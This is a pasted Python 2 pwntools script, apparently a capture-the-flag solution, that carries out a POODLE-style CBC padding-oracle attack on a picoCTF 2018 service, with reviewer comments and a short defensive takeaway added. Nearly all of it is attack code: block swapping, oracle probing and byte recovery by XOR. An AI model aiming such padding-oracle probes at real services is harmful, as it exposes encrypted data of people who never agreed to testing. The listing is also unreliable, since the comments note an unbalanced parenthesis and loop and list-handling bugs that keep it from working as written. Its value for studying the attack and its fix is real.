
Untitled

a guest Mar 24th, 2019 59 Never
from pwn import *

# Filler strings sent as the two client-controlled inputs of the service
# (the answers to the 'report: ' and 'else? ' prompts in send()).
# The driver loop at the bottom of the file passes frontPadding[i:] and
# backPadding + '.' * i, so the combined filler length stays at 46 while
# one character per step moves from the front input to the back input.
# NOTE(review): presumably this shifts the unknown text by one byte per step
# relative to the cipher block boundaries -- confirm against the challenge.
frontPadding = '.' * 43
backPadding = '.' * 3
# Implementation of the POODLE attack (a CBC padding-oracle technique), as
# labelled by the author, against a picoCTF 2018 challenge service.
# Defensive takeaway: the probe depends on the service telling the client
# whether a modified ciphertext decrypted successfully (see the
# 'Successful decryption' check below). Authenticating the ciphertext before
# decrypting it (encrypt-then-MAC or an AEAD mode) removes that signal.
def send(frontPadding, backPadding):
    """Run one probe against the service and report whether it was accepted.

    Opens a new connection, submits the two filler strings, reads back the
    hex ciphertext, then resubmits it with the last block replaced by a copy
    of block 8.

    Returns (False, []) when the reply does not contain
    'Successful decryption'; otherwise (True, [value]) where value is the
    XOR expression on the final line of this function.

    Python 2 only: relies on str.decode('hex') and byte-string socket data.
    """
    p = remote('2018shell1.picoctf.com', 14263)
    # Menu option 'e' -- presumably "encrypt"; the two prompts that follow
    # take the client-supplied text placed before and after the secret.
    p.recvuntil('(S)')
    p.sendline('e')
    p.recvuntil('report: ')
    p.sendline(frontPadding)
    p.recvuntil('else? ')
    p.sendline(backPadding)
    # First line of the reply, minus an 11-character prefix, is the hex ciphertext.
    outputStr = p.recvuntil('(S)').split('\n')[0][11:] # getting the hex output
    # Split into 32-hex-character chunks (16 bytes each). The range stops at
    # len - 32, so the final chunk is not stored; only indexes up to 13 are
    # read below.
    output = []
    for i in range(0, len(outputStr) - 32, 32):
        output.append(outputStr[i:i+32])
    # we are interested in block 8 and its previous block, 7, remember first block is the randomized iv
    interestBlock = output[8]
    interestBlockPrev = output[7]
    # also need second to last block for decryption if successful
    interestBlockLast = output[13]
    # replace padding block (block 14) with interestBlock
    # 448 hex characters = blocks 0-13 kept unchanged.
    exploit = outputStr[0:448] + interestBlock
    # sending in the probable exploit
    # Menu option 's' -- presumably "submit a message for decryption".
    p.sendline('s')
    p.recvuntil('message: ')
    p.sendline(exploit)
    result = p.recvall()
    p.close()
    # The service's accept/reject reply is the oracle: it discloses whether
    # the tampered ciphertext still decrypted with valid padding.
    if 'Successful decryption' not in result:
        return False, []
    else:
        # XOR of the pad value 0x10 with the last character of block 13 and
        # the last character of block 7.
        # NOTE(review): as pasted, this line has one more '(' than ')', so
        # the listing does not parse.
        return True, [(xor(xor(0x10, interestBlockLast[-1].decode('hex')), interestBlockPrev[-1].decode('hex'))]
# Driver: repeat the probe for 29 filler alignments (Python 2 print statements).
flag = ''  # NOTE(review): initialised here but not assigned again in this listing
result = False
output = []
# `repeat` controls the retry loop: the probe is re-sent until send() reports success.
repeat = True
for i in range(29):
    while repeat:
        try:
            # Move i filler characters from the front input to the back input.
            result, output = send(frontPadding[i:], backPadding + '.' * i)
            repeat = False
            if result:
                # ANSI green escape codes around the status line and the recovered character.
                print '\033[92mSUCCESS ON ONE CHARACTER\033[0m'
                print '\033[92m' + chr(output[0]) + '\033[0m'
                break
            else:
                repeat = True
        except Exception as e:
            # An exception raised by send() leaves `repeat` True, so the probe
            # is retried with no limit and no delay. On the server side this
            # would presumably appear as a run of short-lived connections that
            # mostly end in a failed decryption -- a useful detection signal.
            print 'Error... retrying'
    # NOTE(review): `repeat` is still False here after a success, so the
    # `while` body above is skipped for later values of i as written.
    # `output` is the list returned by send(); += extends that list with the
    # character rather than building a string.
    output += chr(output[0])
    print output
print output